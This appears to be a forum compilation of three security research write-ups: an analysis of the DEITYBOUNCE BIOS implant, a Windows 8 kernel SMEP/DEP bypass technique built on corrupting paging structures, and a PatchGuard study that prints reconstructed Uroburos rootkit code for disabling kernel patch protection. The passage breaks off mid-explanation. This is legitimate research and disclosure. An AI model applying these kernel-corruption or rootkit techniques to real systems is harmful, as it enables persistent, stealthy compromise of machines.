The presence of a payload being dropped by DEITYBOUNCE means DEITYBOUNCE is basically a "second-stage" malware dropper—the first stage is the ARKSTREAM malware dropper. DEITYBOUNCE probably provides only two core functions. The first is to act as a persistent and stealthy dropper of malware modules. The second is to provide a "stealth" control function for other OS-specific malware modules. The malware modules could run during OS initialization, from inside a running OS, or in both scenarios. The OS-specific malware communicates with DEITYBOUNCE via SMM calls. The DEITYBOUNCE core functions above imply that three kinds of malware components are required for DEITYBOUNCE to work:

- A persistent "infected" PCI expansion ROM. This module contains a routine to configure DEITYBOUNCE's frequency of execution; the routine possibly stores the configuration in the RAID controller NVRAM. This module also contains the tainted interrupt 13h (Int 13h) handler that can call other routines via SMI to patch the kernel of the currently loading OS.
- SMI handler code implanted in the PowerEdge motherboard BIOS to serve the software (SW) SMI calls from the "infected" RAID controller PCI expansion ROM.
- An OS-specific malware payload running in Windows 2000, Windows Server 2003, or Windows XP.

At this point we know the DEITYBOUNCE malware components. This doesn't mean we can know the exact architecture of the malware, because there are several possible ways to implement the components. However, I present the most probable architecture here. This is an educated guess. There could be inaccuracies, because I don't have a sample DEITYBOUNCE binary to back up my assertions, but I think the guesses should be close enough, given the nature of x86/x64 firmware architecture. If you could provide a binary sample with suspected DEITYBOUNCE in it, I'm open to analyzing it, though.
DEITYBOUNCE Malware Architecture

We need to make several assumptions before proceeding to the DEITYBOUNCE architecture. This should make it easier to pinpoint the technical details of DEITYBOUNCE. These are the assumptions:

- The BIOS used by the Dell PowerEdge targets is a legacy BIOS, not EFI/UEFI. This assumption is strengthened by the NSA ANT server document, which mentions the target OS as Windows 2000/XP/2003; none of these operating systems provides mature EFI/UEFI support. The user manuals, including the BIOS setup manual, don't show any menu related to UEFI/EFI support, such as booting in legacy BIOS mode. Therefore, it's safe to assume that the BIOS is a legacy BIOS implementation. Moreover, at the time DEITYBOUNCE launched, EFI/UEFI support in the market was still immature.
- The custom SMI handler routines required to patch the OS kernel during bootstrap are larger than the empty space available in the motherboard BIOS. Therefore, the routines must be split across two separate flash ROM chips, i.e., the PERC RAID controller flash ROM chip and the Dell PowerEdge motherboard flash ROM chip. This may not be the case, but let's make the assumption here, because even a rudimentary NTFS driver would require at least several tens of kilobytes of space when compressed, not to mention a complicated malware designed to patch the kernels of three different operating systems.

The assumptions above have several consequences for our alleged DEITYBOUNCE architecture. The first is that there are two stages in DEITYBOUNCE execution. The second is that the malware code that patches the target OS kernel during bootstrap (interrupt 19h) runs in SMM. Now let's look into the DEITYBOUNCE execution stages, which are as follows:

Stage 1—PCI expansion ROM initialization during power-on self-test (POST).
In this stage, DEITYBOUNCE installs additional malicious SMI handlers in the system management RAM (SMRAM) range of the motherboard RAM. The assumption here is that the SMRAM range has not yet been locked by the motherboard BIOS and is therefore still writable. SMRAM is a range in system memory (RAM) used specifically for SMM code and data. The contents of SMRAM are accessible only through SMI after it has been locked. On most Intel northbridge chipsets and recent CPUs, SMRAM is controlled by the register that controls the TSEG memory region; usually, that register is called TSEG_BASE in Intel chipset documentation.

Stage 2—Interrupt 13h execution during bootstrap (interrupt 19h).

The interrupt 13h handler in the PERC RAID controller PCI expansion ROM is "patched" with malicious code to serve interrupt 19h invocation (bootstrap). Interrupt 19h copies the bootloader to RAM by calling interrupt 13h function 02h (read sectors from drive) and jumps into it. DEITYBOUNCE doesn't compromise the bootloader; it compromises the interrupt 13h handler. The "patched" interrupt 13h handler modifies the loaded OS kernel in RAM. Figure 2 shows stage 1 of DEITYBOUNCE execution and Figure 3 shows stage 2.

Figure 2 DEITYBOUNCE Execution Stage 1

DEITYBOUNCE stage 1 execution, shown in Figure 2, happens during the PCI expansion ROM initialization stage of POST. If you're not familiar with the detailed steps carried out by the BIOS to initialize an x86/x64 system, a.k.a. the power-on self-test, please read my system address map initialization article at System Address Map Initialization in x86/x64 Architecture Part 1: PCI-Based Systems - InfoSec Institute. We know from the Malicious Code Execution in PCI Expansion ROM article (Malicious Code Execution in PCI Expansion ROM - InfoSec Institute) that PCI expansion ROM initialization is initiated by the motherboard BIOS.
The motherboard BIOS calls the INIT function (offset 03h from the start of the PCI expansion ROM) with a far call to start add-on board initialization by the PCI expansion ROM. This event is stage 1 of DEITYBOUNCE execution. In the DEITYBOUNCE case, the add-on board is the PERC PCI/PCIe board or the PERC chip integrated into the PowerEdge motherboard. Figure 2 illustrates the following execution steps:

1. The PERC RAID PCI expansion ROM executes from its INIT entry point.
2. The infected ROM code reads the DEITYBOUNCE configuration data from the RAID controller NVRAM.
3. The infected ROM code copies DEITYBOUNCE's additional SMI handlers to the SMRAM range in the motherboard main memory (system RAM).
4. The infected ROM code fixes checksums of the contents of SMRAM as needed.

Once these steps are finished, SMRAM contains all of DEITYBOUNCE's SMI handlers. Figure 2 shows that SMRAM contains "embedded" DEITYBOUNCE SMI handlers that are already present in SMRAM before the DEITYBOUNCE component in the RAID controller PCI expansion ROM is copied there. The embedded DEITYBOUNCE component is injected into the motherboard BIOS; that's why it's already present in SMRAM early on. Figure 2 also shows the DEITYBOUNCE configuration data stored in the PERC add-on board NVRAM. This is an elegant and stealthy way of storing configuration data. How many anti-malware tools scan add-on board NVRAM? I've never heard of any.

Figure 3 DEITYBOUNCE Execution Stage 2

Now, let's move to stage 2 of DEITYBOUNCE execution. There are several steps in this execution stage, as follows. First, the mainboard BIOS executes the PERC RAID controller PCI expansion ROM routine at bootstrap via interrupt 19h. This time the entry point of the PCI expansion ROM is its BCV, not the INIT function. Interrupt 19h invokes interrupt 13h function 02h to read the first sector of the boot device—in this case the HDD controlled by the RAID controller—into RAM and then jumps into it to start the bootloader.
Second, the infected PCI expansion ROM routine contains a custom interrupt 13h handler. This custom handler executes when interrupt 13h is called by the bootloader and by part of the OS initialization code. The custom routine contains the original interrupt 13h handler logic but adds routines to infect the kernel of the OS being loaded. Interrupt 13h provides services to read/write/query the storage device; therefore, a malicious coder can modify the interrupt 13h handler routine to tamper with the content being loaded into RAM. Figure 3 shows that the custom interrupt 13h handler contains a routine to call the DEITYBOUNCE SMI handler via software SMI. The DEITYBOUNCE SMI handler contains a routine to install malware, or to activate certain vulnerabilities in the target OS kernel, while the OS is still in its initialization phase. Execution of the custom interrupt 13h handler depends on the DEITYBOUNCE configuration data which, as Figure 3 shows, is stored in the PERC RAID controller NVRAM.

The target OS contains a vulnerability or malware after these two steps of DEITYBOUNCE's second-stage execution. Keep in mind that the vulnerability or malware exists only in RAM, because the instance of the OS modified by DEITYBOUNCE exists in RAM, not on a permanent storage device (HDD or SSD). At this point we know how DEITYBOUNCE might work in sufficient detail. However, you should be aware that this is only the result of my preliminary assessment of DEITYBOUNCE; it is therefore bound to have inaccuracies.

Closing Thoughts: Hypotheses on DEITYBOUNCE Technical Purpose

DEITYBOUNCE has two undeniable strategic advantages compared to "ordinary" malware. First, DEITYBOUNCE provides a stealthy way to alter the loaded OS without leaving a trace on the storage device, i.e., HDD or SSD, in order to avoid detection via "ordinary" computer forensic procedures. Why?
Because the OS is manipulated when it's loaded into RAM, the OS installation on the storage device itself is left untouched (genuine). SMM code execution provides a way to conceal the code execution from possible OS integrity checks by third-party scanners. In this respect, we can view DEITYBOUNCE as a very sophisticated malware dropper. Second, DEITYBOUNCE provides a way to preserve the presence of the malware on the target system, because it persists across OS reinstallation.

Given the capabilities provided by DEITYBOUNCE, there could be a stealthy Windows rootkit that communicates with DEITYBOUNCE via software SMI to call the DEITYBOUNCE SMI handler routine at runtime from within Windows. The purpose of such a rootkit is unclear at this point, and whether the required SMI handler is implemented by DEITYBOUNCE is unknown at the moment.

By Darmawan Salihun|January 29th, 2014 Sursa: NSA BIOS Backdoor a.k.a. God Mode Malware Part 1: DEITYBOUNCE - InfoSec Institute
-
Windows 8 Kernel Memory Protections Bypass

Recently, MWR intern Jérémy Fetiveau (@__x86) conducted a research project into the kernel protections introduced in Microsoft Windows 8 and newer. This blog post details his findings and presents a generic technique for exploiting kernel vulnerabilities, bypassing SMEP and DEP. Proof-of-concept code is provided which reliably gains SYSTEM privileges and requires only a single vulnerability that provides an attacker with a write-what-where primitive. We demonstrate this issue by providing a custom kernel driver which simulates the presence of such a kernel vulnerability.

Introduction

Before diving into the details of the bypass technique, we will quickly run through some of the technologies we will be breaking, and what they do. If you want to grab the code and follow along as we go, you can get the zip of the files here.

SMEP

SMEP (Supervisor Mode Execution Prevention) is a mitigation that aims to prevent the CPU from running user-mode code while in kernel-mode. SMEP is implemented at the page level and works by setting flags on a page table entry, marking it as either U (user) or S (supervisor). When accessing a page of memory, the MMU checks this flag to make sure the memory is suitable for use in the current CPU mode.

DEP

DEP (Data Execution Prevention) operates much as it does in user-mode and is also implemented at the page level by setting flags on a page table entry. The basic principle of DEP is that no page of memory should be both writeable and executable, which aims to prevent the CPU from executing instructions provided as data by the user.

KASLR

KASLR (Kernel Address Space Layout Randomization) is a mitigation that aims to prevent an attacker from successfully predicting the address of a given piece of memory. This is significant, as many exploitation techniques rely on an attacker being able to locate the addresses of important data such as shellcode, function pointers, etc.
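A toy model (Python; simplified, all names mine) of how these page-level checks interact, capturing just the rules this post relies on: a page is a user page only if U/S is set at every paging level, it is executable only if NX is clear at every level, and SMEP forbids kernel-mode execution of user pages.

```python
# Toy model of the SMEP/DEP rules discussed above. Simplified: real
# MMU behavior has more cases (WP, SMAP, large pages, ...).

def can_execute(entries, kernel_mode, smep_enabled=True):
    """entries: one {'user': bool, 'nx': bool} dict per paging level."""
    user_page = all(e["user"] for e in entries)
    executable = not any(e["nx"] for e in entries)
    if not executable:                          # DEP: NX anywhere => no exec
        return False
    if kernel_mode and user_page and smep_enabled:
        return False                            # SMEP: kernel can't run user pages
    if not kernel_mode and not user_page:
        return False                            # user code can't touch supervisor pages
    return True

user_exec_page = [{"user": True, "nx": False}] * 4
print(can_execute(user_exec_page, kernel_mode=True))    # False: SMEP blocks it
print(can_execute(user_exec_page, kernel_mode=False))   # True

# Flip U/S to supervisor at every level (the technique this post
# builds up to) and the same memory becomes kernel-executable:
supervisor_page = [{"user": False, "nx": False}] * 4
print(can_execute(supervisor_page, kernel_mode=True))   # True
```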
Paging 101

With the use of virtual memory, the CPU needs a way to translate virtual addresses to physical addresses. Several paging structures are involved in this process. Let's first consider a toy example where we only have page tables to perform the translation. For each running process, the processor will use a different page table. Each entry of this page table contains the information "virtual page X references physical frame Y." Of course, these frames are unique, whereas pages are relative to their page table. Thus we can have a process A with a page table PA containing an entry "page 42 references frame 13" and a process B with a page table PB containing an entry "page 42 references frame 37." If we consider a format for virtual addresses that consists of a page table field followed by an offset referencing a byte within that page, the same virtual address 42|10 (page 42, offset 10) would correspond to two different physical locations according to which process is currently running (and which page table is currently active).

For a 64-bit x86_64 processor, virtual address translation works roughly the same way. However, in practice the processor does not use only page tables; it uses four different structures. In the previous example, we had physical frames referenced by PTEs (page table entries) within PTs (page tables). In reality, the format for virtual addresses looks more like the illustration below: the cr3 register contains the physical address of the PML4, and the PML4 field of a virtual address is used to select an entry within this PML4. The selected PML4 entry contains (along with a few flags) the physical address of a PDPT (Page Directory Pointer Table). The PDPT field of a virtual address then references an entry within this PDPT, and, as expected, this PDPT entry contains the physical address of a PD.
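As a sketch, the 48-bit split just described comes down to a few shifts and masks (standard x86_64 4-level paging: four 9-bit indices plus a 12-bit page offset; the helper name is mine):

```python
# Decompose a 48-bit canonical virtual address into its four 9-bit
# paging-structure indices and 12-bit page offset (x86_64 4-level
# paging). Illustrative helper, not kernel code.
def decompose(va):
    return (
        (va >> 39) & 0x1FF,   # PML4 index
        (va >> 30) & 0x1FF,   # PDPT index
        (va >> 21) & 0x1FF,   # PD index
        (va >> 12) & 0x1FF,   # PT index
        va & 0xFFF,           # byte offset within the 4KB page
    )

# The address used later by this post's POC decomposes into the same
# index (32) at every level, which is part of what makes its paging
# entries easy to isolate:
print(decompose(0x100804020001))  # (32, 32, 32, 32, 1)
```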
We can therefore use the PD field of the virtual address to reference an entry within the PD, and so on and so forth. This is well summarized by Intel's schema. It should now be clearer how the hardware actually translates virtual addresses to physical addresses. An interested reader who is not familiar with the inner workings of x64 paging can refer to Section 4.5 of Volume 3A of the Intel manuals for more in-depth explanations.

Previous Exploitation Techniques

In the past, kernel exploits commonly redirected execution to memory allocated in user-land. Due to the presence of SMEP, this is no longer possible. Therefore, an attacker would have to inject code into kernel memory, or convince the kernel to allocate memory with attacker-controlled content. This was commonly achieved by allocating executable kernel objects containing attacker-controlled data. However, due to DEP, most objects are now non-executable (for example, the "NonPagedPoolNx" pool type has replaced "NonPagedPool"). An attacker would now have to find a way to use a kernel payload based on return-oriented programming (ROP), which re-uses existing executable kernel code. In order to construct such a payload, an attacker would need to know the location of certain "ROP gadgets" containing the instructions to be executed. However, due to the presence of KASLR, these gadgets will be at different addresses on each run of the system, so locating them would likely require additional vulnerabilities.

Technique Overview

The presented technique consists of writing a function to deduce the addresses of paging structures from a given user-land memory address. Once these structures are located, we are able to partially corrupt them to change the metadata, allowing us to "trick" the kernel into thinking a chunk that was originally allocated in user-mode is suitable for use in kernel-mode.
We can also corrupt the flags checked by DEP to make the contents of the memory executable. By doing this in a controlled manner, we can take a piece of memory that was initially allocated as non-executable by a user-mode process and modify the relevant paging structures so that it can be executed as kernel-mode code. We will describe this technique in more detail below.

Retrieving the Addresses of Paging Structures

When the kernel wants to access paging structures, it has to find their virtual addresses. The processor's instructions only allow the manipulation of virtual addresses, not physical ones. Therefore, the kernel needs a way to map those paging structures into virtual memory. For that, several operating systems use a special self-referencing PML4 entry. Instead of referencing a PDPT, this PML4 entry references the PML4 itself, shifting the other fields to make space for the new self-reference field. Thus, instead of referencing a specific byte of memory within a memory page, a PTE is referenced. It is possible to retrieve the higher-level structures by using the same self-reference entry several times. A good description of this mechanism can be found in the excellent book What makes it page? The Windows 7 (x64) virtual memory manager by Enrico Martignetti.

A Step-By-Step Example

To better understand this process, let's go through an example showing how to build a function that maps a virtual address to the address of its PTE. First, we should remind ourselves of the usual format of a virtual address: a canonical address has its 48 bits composed of four 9-bit fields and one 12-bit offset field. The PML4 field references an entry within the PML4, the PDPT field references an entry within the PDPT, and so on and so forth. If we want to reference a PTE instead of a byte located within a page, we can use the special PML4 entry 0y111101101 (0x1ED).
We fill the PML4 field with this special entry and then shift everything 9 bits to the right, giving an address in the self-map format. We use this technique to build a function which maps the address of a byte of memory to the address of its PTE. If you are following along in the code, this is implemented in the function "getPTfromVA" in the file "computation.cpp". It should be noted that, even though the last offset field is 12 bits, we still do a 9-bit shift and set the remaining low bits to 0 so that we get an aligned address. To get the other structures, we can simply apply the same technique several times; the PDE address, for example, is obtained by applying the same transform to the PTE address.

Modifying Paging Structures

We use the term PXE as a generic term for paging-structure entries, as many of them share the same layout. There are a number of interesting fields here, especially the NX bit, which defines whether the memory may be executed, and the flags at the end, which include the U/S flag. The U/S flag denotes whether the memory is for use in user-mode or supervisor-mode (kernel-mode). When checking the rights of a page, the kernel checks every PXE involved in the address translation. That means that if we want to check whether the U/S flag is set, we must check all entries relating to that page. If any of the entries does not have the supervisor flag set, any attempt to use the page from kernel mode will trigger a fault; if all of the entries have the supervisor flag set, the page is considered a kernel-mode page. Because DEP is set at page granularity, the higher-level paging structures are typically marked as executable, with DEP being applied at the PTE level by setting the NX bit. Because of this, rather than starting by allocating kernel memory, it is easier to allocate user memory with executable rights using the standard API, and then corrupt the paging structures to modify the U/S flag and cause it to be interpreted as kernel memory.
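The mapping just described can be sketched as follows (Python; it mirrors what "getPTfromVA" computes, assuming the fixed self-referencing PML4 index 0x1ED that Windows used at the time): drop the page offset, shift the remaining fields right by 9 into an 8-byte-aligned entry offset, substitute the self-reference index into the PML4 field, and sign-extend to a canonical address.

```python
# Sketch of the self-map address derivation described above, assuming
# the fixed self-referencing PML4 index 0x1ED (0y111101101).
SELF_REF = 0x1ED

def get_pxe_from_va(va):
    """One application of the self-map: VA of a byte -> VA of its PTE.
    Applying it twice yields the PDE, three times the PDPTE, etc."""
    entry = (va & 0x0000FFFFFFFFF000) >> 9   # drop offset, shift fields right
    pxe = (SELF_REF << 39) | entry           # substitute self-ref PML4 index
    return pxe | 0xFFFF000000000000          # sign-extend to canonical form

print(hex(get_pxe_from_va(0)))                   # 0xfffff68000000000
print(hex(get_pxe_from_va(get_pxe_from_va(0))))  # 0xfffff6fb40000000
```

Note that the two printed values are the well-known PTE and PDE base addresses of Windows versions of that era, which is a useful sanity check on the derivation.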
Using Isolated PXEs

If we corrupt a random PXE, we are likely to be in a case where the target PXE is part of a series of PXEs that are contiguous in memory. In these cases, during exploitation it might mean that an attacker would corrupt adjacent PXEs, which has a high risk of causing a crash. Most of the time, the attacker can't simply modify only 1 bit in memory, but has to corrupt several bytes (8 bytes in our POC), which will force the attacker to corrupt more than just the relevant flags for the exploit. The easiest way to circumvent this issue is simply to target a PXE which is isolated (e.g., with unused PXE structures on either side of the target PXE). In 64-bit environments, a process has access to a huge virtual address space of 256TB, as we are effectively using 48-bit canonical addresses instead of the full 64-bit address space. A 48-bit virtual address is composed of several fields allowing it to reference different paging structures. As the PML4 field is 9 bits, it refers to one of 512 (2**9) PML4 entries. Each PML4 entry describes a range of 512GB (2**39 bytes). Obviously, a user process will not use so much memory that it consumes all of the PML4 entries. Therefore, we can request the allocation of memory at an address outside of any used 512GB range. This will force the use of a new PML4 entry, which will reference structures containing only a single PDPT entry, a single PDE and a single PTE. An interested reader can verify this idea using the "!address" and "!pte" windbg extensions to observe those "holes" in memory. In the presented POC, the 0x100804020001 address is used, as it is very likely to be in an unused area.

Practical Attack

The code for the mitigation bypass is very simple. Suppose that we've got a vulnerable kernel component for which we are able to exploit a vulnerability which gives us a write-what-where primitive from a user-land process (this is implemented within the "write_what_where" function in our POC).
We choose a virtual address with isolated paging structures (such as 0x100804020001), allocate it and fill it with our shellcode. We then retrieve all of its paging structures using the mapping function described earlier in this post (using the field shifting and the self-referencing PML4). Finally, we perform unaligned overwrites of the 4 PXEs relating to our chosen virtual address to modify its U/S bit to supervisor. Of course, other slightly different scenarios for exploitation could be considered. For instance, if we can decrement or increment an arbitrary value in memory, we could just flip the desired flags. Also, since we are using isolated paging structures, even in the case of a bug leading to the corruption of a lot of adjacent data, the technique can still be used, because it is unlikely that any important structures are located in the adjacent memory. With this blog post, we provide an exploit for a custom driver with a very simple write-what-where vulnerability so as to let the reader experiment with the technique. However, this document was originally submitted to Microsoft with a real-world use-after-free vulnerability. Indeed, in a lot of cases, it would be possible for an attacker to force a write-what-where primitive from a vulnerability such as a use-after-free or a pool overflow.

Mitigating the Attack

This technique is not affected by KASLR because it is possible to directly derive the addresses of paging structures from a given virtual address. If randomization was introduced into this mapping, this would no longer be possible, and this technique would be mitigated as a result. Randomizing this function would require having a different self-referencing PML4 entry each time the kernel boots. However, it is recognised that many of the core functions of the kernel memory management may rely on this mapping to locate and update paging structures.
It might also be possible to move the paging structures into a separate segment, and reference these structures using an offset in that segment. If we consider the typical write-what-where scenarios, unless the address specified already had a segment prefix, it would not be possible for an attacker to overwrite the paging structures, even if the offset within the segment was known. If this is not possible, another approach might be to use a hardware debug register as a faux locking mechanism. For example, if a hardware breakpoint was set on access to the paging structures (or on key fields of the structures), a handler for that breakpoint could test the value of the debug register to assess whether the access is legitimate or not. Before a legitimate modification to the paging structures, the kernel can unset the debug register, and no exception would be thrown. If an attacker attempted to modify the memory without unsetting the debug register, an exception could be thrown to detect this.

Vendor Response

We reported this issue to Microsoft as part of their Mitigation Bypass Bounty Program. However, they indicated that this did not meet all of their program guidelines as it cannot be used to remotely exploit user-mode vulnerabilities. In addition, Microsoft stated that their security engineering team were aware of this "limitation", that they did not consider this a security vulnerability, and that the development of a fix was not currently planned. With this in mind, we have decided to release this post and the accompanying code to provide a public example of current Windows kernel research. However, we have chosen not to release the fully weaponised exploit we developed as part of the submission to Microsoft, as it makes use of a vulnerability that has only recently been patched.

Conclusion

The technique proposed in this post allows an attacker to reliably bypass both DEP and SMEP in a generic way.
We showed that it is possible to derive the addresses of paging structures from a virtual address, and how an attacker could use this to corrupt paging structures so as to create executable kernel memory, even at low memory addresses. We demonstrated that this technique is usable without the fear of corrupting non-targeted PXEs, even if the attacker has to corrupt large quantities of memory. Furthermore, we showed that this technique is not specific to bugs that provide a write-what-where primitive, but can also be used for a broad range of bug classes.

Sursa: https://labs.mwrinfosecurity.com/blog/2014/08/15/windows-8-kernel-memory-protections-bypass/
-
The Windows 8.1 Kernel Patch Protection

In the last 3 months we have seen a lot of machines compromised by Uroburos (a kernel-mode rootkit that spreads in the wild and specifically targets Windows 7 64-bit). Curiosity led me to start analyzing the code for Kernel Patch Protection on Windows 8.1. We will take a glance at its current implementation on that operating system and find out why the Kernel Patch Protection modifications made by Uroburos on Windows 7 don't work on the Windows 8.1 kernel. In this blog post, we will refer to the technology known as "Kernel Patch Protection" as "Patchguard". Specifically, we will call the Kernel Patch Protection on Windows 7 "Patchguard v7", and the more recent Windows 8.1 version "Patchguard v8". The implementation of Patchguard has changed slightly between versions of Windows. I would like to point out the following articles that explain the internal architecture of older versions of Patchguard:

Skape, Bypassing PatchGuard on Windows x64, Uninformed, December 2005
Skywing, PatchGuard Reloaded - A Brief Analysis of PatchGuard Version 3, Uninformed, September 2007
Christoph Husse, Bypassing PatchGuard 3 - CodeProject, August 2008

Kernel Patch Protection - Old Version Attack Methods

We have seen some attacks targeting older versions of the Kernel Patch Protection technology. Some of those (see Fyyre's website for examples) disarm Patchguard by preventing its initialization code from being called. Patchguard is indeed initialized at Windows startup time, when the user switches on the workstation. To do this, various technologies have been used: the MBR Bootkit (PDF, in Italian), VBR Bootkit, and even a brand-new UEFI Bootkit. These kinds of attacks are quite easy to implement, but they have a big drawback: they all require the victim's machine to be rebooted, and they are impossible to exploit if the target system implements some kind of boot manager digital signature protection (like Secure Boot).
Other techniques relied on different tricks to evade Patchguard or to totally block it. These techniques involve:

x64 debug registers (DR registers) - Place a managed hardware breakpoint on every read access in the modified code region. This way the attacker can restore the modification and then continue execution.

Exception handler hooking - Patchguard's validation routine (the procedure that calls and raises the Kernel Patch Protection checks) is executed through exception handlers that are raised by certain Deferred Procedure Call (DPC) routines; this feature gives attackers an easy way to disable Patchguard.

Hooking KeBugCheckEx and/or other key kernel functions - System compromises are reported through the KeBugCheckEx routine (BugCheck code 0x109); this is an exported function. Patchguard clears the stack, so there is no return point once one enters KeBugCheckEx, though there is a catch: one can easily resume the thread using the standard "thread startup" function of the kernel.

Patching the kernel timer DPC dispatcher - Another attack cited by Skywing (see references above). By design, Patchguard's validation routine relies on the dispatcher of the kernel timers to kick in and dispatch the deferred procedure call (DPC) associated with the timer. Thus, an obvious target for attackers is to patch the kernel timer's DPC dispatcher code to call their own code. This attack method is easy to implement.

Patchguard code direct modification - An attack method described in a paper by McAfee. They located the encrypted Patchguard code directly in the kernel heap, then manually decrypted it and modified its entry point (the decryption code). The Patchguard code was finally manually re-encrypted.

The techniques described above are quite ingenious. They disable Patchguard without rebooting the system or modifying boot code.
It's worth noting that the latest Patchguard implementation has rendered all these techniques obsolete, because it has been able to completely neutralize them. Now let's analyse how the Uroburos rootkit implements the KeBugCheckEx hook to turn off Kernel Patch Protection on a Windows 7 SP1 64-bit system.

Uroburos Rootkit - The KeBugCheckEx Hook

Analysing an infected machine reveals that the Uroburos 64-bit driver doesn't install any direct hook on the kernel crash routine named "KeBugCheckEx". So why doesn't it do any direct modification? To answer this question, an analysis of the Patchguard v7 code is needed. Patchguard copies the code of some kernel functions into a private kernel buffer. The copied procedures are directly used by Patchguard to perform all integrity checks, including crashing the system if any modification is found. In the case of system modifications, it copies the functions back to their original location and crashes the system. The problem with the implementation of Patchguard v7 lies in the code of the procedures used by the protected routines: that code is vulnerable to direct manipulation, as there is only one copy (the original one). This is, in fact, the Uroburos strategy: KeBugCheckEx is not touched in any manner. Only a routine used directly by KeBugCheckEx is forged: RtlCaptureContext. The Uroburos rootkit installs deviations in the original Windows kernel routines by registering a custom software interrupt, 0x3C. In the forged routines, the interrupt is raised using the x86 "int" opcode.

RtlCaptureContext

The Uroburos interrupt service routine related to the RtlCaptureContext routine (sub-type 1) is raised by the forged code. The software interrupt is dispatched, the original routine is called, and finally the processor context is analysed. A filter routine is called.
It implements the following code:

/* Patchguard Uroburos filter routine
 * dwBugCheckCode - Bugcheck code saved on the stack by the KeBugCheckEx routine
 * lpOrgRetAddr   - Original RtlCaptureContext call return address
 */
void PatchguardFilterRoutine(DWORD dwBugCheckCode, ULONG_PTR lpOrgRetAddr)
{
    LPBYTE pCurThread = NULL;            // Current running thread
    LPVOID lpOrgThrStartAddr = NULL;     // Original thread start address
    DWORD dwProcNumber = 0;              // Current processor number
    ULONG mjVer = 0, minVer = 0;         // OS major and minor version indexes
    QWORD * qwInitialStackPtr = 0;       // Thread initial stack pointer
    KIRQL kCurIrql = KeGetCurrentIrql(); // Current processor IRQL

    // Get OS version
    PsGetVersion(&mjVer, &minVer, NULL, NULL);

    if (lpOrgRetAddr > (ULONG_PTR)KeBugCheckEx &&
        lpOrgRetAddr < ((ULONG_PTR)KeBugCheckEx + 0x64) &&
        dwBugCheckCode == CRITICAL_STRUCTURE_CORRUPTION) {
        // This is the KeBugCheckEx Patchguard invocation
        // Get initial stack pointer
        qwInitialStackPtr = (LPQWORD)IoGetInitialStack();

        if (g_lpDbgPrintAddr) {
            // DbgPrint is forged with a single "RETN" opcode, restore it
            // DisableCR0WriteProtection();
            // ... restore original code ...
            // RestoreCR0WriteProtection();   // Revert CR0 memory protection
        }

        pCurThread = (LPBYTE)KeGetCurrentThread();
        // Get original thread start address from ETHREAD
        lpOrgThrStartAddr = *((LPVOID*)(pCurThread + g_dwThrStartAddrOffset));
        dwProcNumber = KeGetCurrentProcessorNumber();

        // Initialize and queue anti-Patchguard DPC
        KeInitializeDpc(&g_antiPgDpc, UroburusDpcRoutine, NULL);
        KeSetTargetProcessorDpc(&g_antiPgDpc, (CCHAR)dwProcNumber);
        KeInsertQueueDpc(&g_antiPgDpc, NULL, NULL);

        // If target OS is Windows 7
        if (mjVer >= 6 && minVer >= 1)
            // Put stack base address in first stack element
            qwInitialStackPtr[0] = ((ULONG_PTR)qwInitialStackPtr + 0x1000) & (~0xFFF);

        if (kCurIrql > PASSIVE_LEVEL) {
            // Restore original DPC context (the "KiRetireDpcList" Uroburos
            // interrupt plays a key role here). This call doesn't return
            RestoreDpcContext();   // The faked DPC will be processed
        } else {
            // Jump directly to original thread start address (ExpWorkerThread)
            JumpToThreadStartAddress((LPVOID)qwInitialStackPtr, lpOrgThrStartAddr, NULL);
        }
    }
}

As the reader can see, the code is quite straightforward. First it analyses the original context: if the return address lives in the prologue of the kernel routine KeBugCheckEx and the bugcheck code equals CRITICAL_STRUCTURE_CORRUPTION, then Uroburos has intercepted a Patchguard crash request. The initial thread start address and stack pointer are obtained from the ETHREAD structure, and a faked DPC is queued:

// NULL Uroburos anti-Patchguard DPC
void UroburusDpcRoutine(struct _KDPC *Dpc, PVOID DeferredContext,
                        PVOID SystemArgument1, PVOID SystemArgument2)
{
    return;
}

Code execution is resumed in one of two different places based on the current Interrupt Request Level (IRQL). If the IRQL is at PASSIVE_LEVEL, a standard JMP opcode is used to return to the original start address of the thread from which the Patchguard check originated (in this case, a worker thread created by the "ExpWorkerThread" routine). If the IRQL is at DISPATCH_LEVEL or above, Uroburos will exploit the previously acquired processor context using the KiRetireDpcList hook. Uroburos will then restart code execution at the place where the original call to KiRetireDpcList was made, remaining at the high IRQL level. The faked DPC is needed to prevent a crash of the restored thread.

KiRetireDpcList and RtlLookupFunctionEntry

As shown above, the KiRetireDpcList hook is needed to restore the thread context in case of a high IRQL. This hook saves the processor context before the original call is made and then transfers execution back to the original KiRetireDpcList Windows code. Publicly available literature about Uroburos claims that the RtlLookupFunctionEntry hook is related to the anti-Patchguard feature. This is wrong.
Our analysis has pinpointed that this hook is there only to hide and protect the Uroburos driver's RUNTIME_FUNCTION array (see my previous article about Windows 8.1 Structured Exception Handling).

Conclusion

The Uroburos anti-Patchguard feature code is quite simple but very effective. This method is practically able to disarm all older versions of the Windows Kernel Patch Protection without any issues or system crashes.

Patchguard v8 - Internal Architecture

STARTUP

The Windows Nt kernel startup is accomplished in 2 phases. The Windows Internals book describes the nitty-gritty details of both phases. Phase 0 builds the rudimentary kernel data structures required to allow the services needed in phase 1 to be invoked (page tables, per-processor Processor Control Blocks (PRCBs), internal lists, resources and so on…). At the end of phase 0, the internal routine InitBootProcessor uses a large call stack that ends right at the Phase1InitializationDiscard function. This function, as the name implies, discards the code that is part of the INIT section of the kernel image in order to preserve memory. Inside it, there is a call to the KeInitAmd64SpecificState routine.
Analysing it reveals that the code is not related to its name:

int KeInitAmd64SpecificState()
{
    DWORD dbgMask = 0;
    int dividend = 0, result = 0;
    int value = 0;

    // Exit in case the system is booted in safe mode
    if (InitSafeBootMode)
        return 0;

    // KdDebuggerNotPresent: 1 - no debugger; 0 - a debugger is attached
    dbgMask = KdDebuggerNotPresent;
    // KdPitchDebugger: 1 - debugger disabled; 0 - a debugger could be attached
    dbgMask |= KdPitchDebugger;

    if (dbgMask)
        dividend = -1;     // Debugger completely disabled
    else
        dividend = 0x11;   // Debugger might be enabled

    value = (int)_rotr(dbgMask, 1);   // "value" is equal to 0 if a debugger is
                                      // enabled, 0x80000000 if it is NOT enabled

    // Perform a signed division between two 32-bit integers:
    result = (int)(value / dividend); // IDIV value, dividend
    return result;
}

The routine's code ends with a signed division: if a debugger is present the division evaluates to 0 (0 divided by 0x11 is 0), otherwise a strange thing happens: 0x80000000 divided by 0xFFFFFFFF raises an overflow exception. To understand why, let's simplify everything and perform, as an example, an 8-bit signed division such as -128 divided by -1. The result should be +128. Here is the assembly code:

mov cl, FFh
mov ax, FF80h
idiv cl

